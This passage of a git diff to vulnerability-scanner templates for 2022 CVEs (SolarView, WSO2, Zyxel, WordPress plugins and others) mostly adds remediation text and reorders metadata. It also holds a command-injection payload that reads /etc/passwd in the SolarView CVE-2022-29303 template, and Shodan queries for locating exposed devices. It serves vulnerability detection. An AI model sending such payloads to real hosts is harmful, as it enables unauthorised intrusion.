SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50950 - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-29298 cwe-id: CWE-22 epss-score: 0.13411 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* epss-percentile: 0.94862 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"SolarView Compact" verified: true + max-request: 1 vendor: contec product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" tags: lfi,solarview,edb,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index ba8aac9026..7346cd4105 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -6,14 +6,16 @@ info: severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 classification: cve-id: CVE-2022-29299 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-244067125 tags: cve,cve2022,xss,solarview,edb diff --git a/http/cves/2022/CVE-2022-29301.yaml b/http/cves/2022/CVE-2022-29301.yaml index c87bd58cbc..a8662ea832 100644 --- a/http/cves/2022/CVE-2022-29301.yaml +++ b/http/cves/2022/CVE-2022-29301.yaml @@ -6,14 +6,16 @@ info: severity: high description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. reference: - https://www.exploit-db.com/exploits/50968 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 classification: cve-id: CVE-2022-29301 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-244067125 tags: cve,cve2022,xss,solarview,edb diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 1485f60190..85eefe095b 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-29303 cwe-id: CWE-78 epss-score: 0.9661 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* epss-percentile: 0.99454 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"SolarView Compact" verified: true + max-request: 1 vendor: contec product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 86f22a4816..b545f4805f 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + remediation: | + Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability. reference: - https://github.com/kekingcn/kkFileView/issues/347 - https://nvd.nist.gov/vuln/detail/CVE-2022-29349 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-29349 cwe-id: CWE-79 epss-score: 0.01051 - cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* epss-percentile: 0.82198 + cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"kkFileView" verified: true + max-request: 1 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" tags: cve,cve2022,kkFileView,xss http: diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index f49b63d2c5..6924e709d0 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 @@ -18,11 +20,11 @@ info: cve-id: CVE-2022-29383 cwe-id: CWE-89 epss-score: 0.56167 - cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* epss-percentile: 0.97221 + cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: netgear product: ssl312_firmware tags: cve,cve2022,sqli,netgear,router diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index 328ad36bdb..ff44439f5a 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. + remediation: | + Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability. reference: - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor - https://www.rotem-bar.com/elementor @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-29455 cwe-id: CWE-79 epss-score: 0.0018 - cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54527 + cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: elementor product: website_builder + framework: wordpress tags: cve,cve2022,xss,wordpress,elementor http: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 44d90e0ff8..2afdc9a679 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. + remediation: | + Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability. reference: - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/ - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-29464 cwe-id: CWE-22 epss-score: 0.97451 - cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* epss-percentile: 0.99922 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:1398055326 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev http: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 90bce2d52b..abf867a071 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + remediation: | + Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-29548 cwe-id: CWE-79 epss-score: 0.00233 - cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* epss-percentile: 0.60683 + cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: inurl:"carbon/admin/login" verified: true + max-request: 1 vendor: wso2 product: api_manager + google-query: inurl:"carbon/admin/login" tags: cve,cve2022,wso2,xss,packetstorm http: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 32d9fe231b..48adfcfad6 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability. reference: - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-29775 cwe-id: CWE-287 epss-score: 0.0103 - cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* epss-percentile: 0.82001 + cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"iSpy is running" verified: true + max-request: 1 vendor: ispyconnect product: ispy + shodan-query: http.html:"iSpy is running" tags: cve,cve2022,ispy,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 81483d05e1..73dcefd465 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. + remediation: | + Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://github.com/APTX-4879/CVE - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.00159 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* epss-percentile: 0.51862 + cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: wbce product: wbce_cms tags: cve,cve2022,wbcecms,xss diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index f95838cc41..196945fe45 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - https://github.com/badboycxcc/XSS @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-30489 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wn535g3_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: xss,cve2022,wavlink,cve,router,iot http: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 90b756ac15..fca46b0abf 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. reference: - https://github.com/bigzooooz/CVE-2022-30512 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-30512 cwe-id: CWE-89 epss-score: 0.0148 - cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.85145 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: school_dormitory_management_system_project product: school_dormitory_management_system tags: cve,cve2022,sqli diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 790975341c..9d7e17b7bc 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30513 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-30513 cwe-id: CWE-79 epss-score: 0.00109 - cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.43104 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: school_dormitory_management_system_project product: school_dormitory_management_system tags: cve,cve2022,xss,authenticated diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 145fd05b12..22e4bb2a4d 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/bigzooooz/CVE-2022-30514 - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-30514 cwe-id: CWE-79 epss-score: 0.00109 - cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.43104 + cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: school_dormitory_management_system_project product: school_dormitory_management_system tags: cve,cve2022,xss,authenticated diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 17dc34c9e3..930173625c 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + remediation: | + Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - https://github.com/rapid7/metasploit-framework/pull/16563 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-30525 cwe-id: CWE-78 epss-score: 0.97528 - cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99982 + cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" vendor: zyxel product: usg_flex_100w_firmware + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" tags: packetstorm,zyxel,cve,cve2022,firewall,unauth,kev,msf,rce http: diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 2bfc55f686..21bc9d57c3 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting + remediation: Fixed in version 4.4.12 reference: - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a - https://nvd.nist.gov/vuln/detail/CVE-2022-3062 - https://wordpress.org/plugins/simple-file-list/ - remediation: Fixed in version 4.4.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* epss-percentile: 0.32485 + cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: simplefilelist product: simple-file-list + framework: wordpress tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list http: diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 73de78d8bf..b5ea8dde24 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + remediation: | + Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - https://www.atmail.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-30776 cwe-id: CWE-79 epss-score: 0.0011 - cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* epss-percentile: 0.43436 + cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"atmail" verified: true + max-request: 1 vendor: atmail product: atmail + shodan-query: http.html:"atmail" tags: cve,cve2022,atmail,xss http: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 6f4f1cb32f..800841dfa3 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + remediation: | + Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - https://en.wikipedia.org/wiki/H-Sphere @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00109 - cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* epss-percentile: 0.43104 + cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"h-sphere" verified: true + max-request: 2 vendor: parallels product: h-sphere + shodan-query: title:"h-sphere" tags: cve,cve2022,parallels,hsphere,xss http: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 54c1ac8ba2..189bd39f24 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. + remediation: Users are advised to upgrade to latest version. reference: - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html - https://www.cve.org/CVERecord?id=CVE-2022-31137 - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9 - https://nvd.nist.gov/vuln/detail/CVE-2022-31137 - https://nvd.nist.gov/vuln/detail/CVE-2022-31126 - remediation: Users are advised to upgrade to latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31126 cwe-id: CWE-74 epss-score: 0.82236 - cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* epss-percentile: 0.9795 + cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Roxy-WI" verified: true + max-request: 1 vendor: roxy-wi product: roxy-wi + shodan-query: http.html:"Roxy-WI" tags: cve,cve2022,rce,unauth,roxy,packetstorm http: diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 89c87a0990..99aa2a1539 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + remediation: | + Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). reference: - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - https://vuldb.com/?id.200500 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-31268 cwe-id: CWE-22 epss-score: 0.00582 - cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* epss-percentile: 0.75319 + cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Gitblit" verified: true + max-request: 1 vendor: gitblit product: gitblit + shodan-query: http.html:"Gitblit" tags: cve,cve2022,lfi,gitblit http: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 78642cffa4..b1871dfe7f 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-31269 cwe-id: CWE-798 epss-score: 0.00302 - cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.65738 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Linear eMerge" verified: true + max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware + shodan-query: http.title:"Linear eMerge" tags: cve2022,emerge,exposure,packetstorm,cve http: diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index 1d0ed09dc6..b420146157 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/bigzooooz/CVE-2022-31299 - https://angtech.org @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-31299 cwe-id: CWE-79 epss-score: 0.00167 - cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* epss-percentile: 0.52759 + cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: angtech product: haraj tags: cve,cve2022,haraj,xss diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index f52420ed19..d1e42fbf5e 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"SolarView Compact" verified: true + max-request: 1 vendor: contec product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" tags: cve,cve2022,xss,solarview http: diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index aeafcf1d9e..719d2d59c0 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -5,26 +5,26 @@ info: author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. + remediation: Upgrade to at least version 8.7.5 or higher reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy - https://ithemes.com/backupbuddy/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474 - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/ - remediation: Upgrade to at least version 8.7.5 or higher classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31474 cwe-id: CWE-22 epss-score: 0.01583 - cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* epss-percentile: 0.85716 + cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ithemes product: backupbuddy + framework: 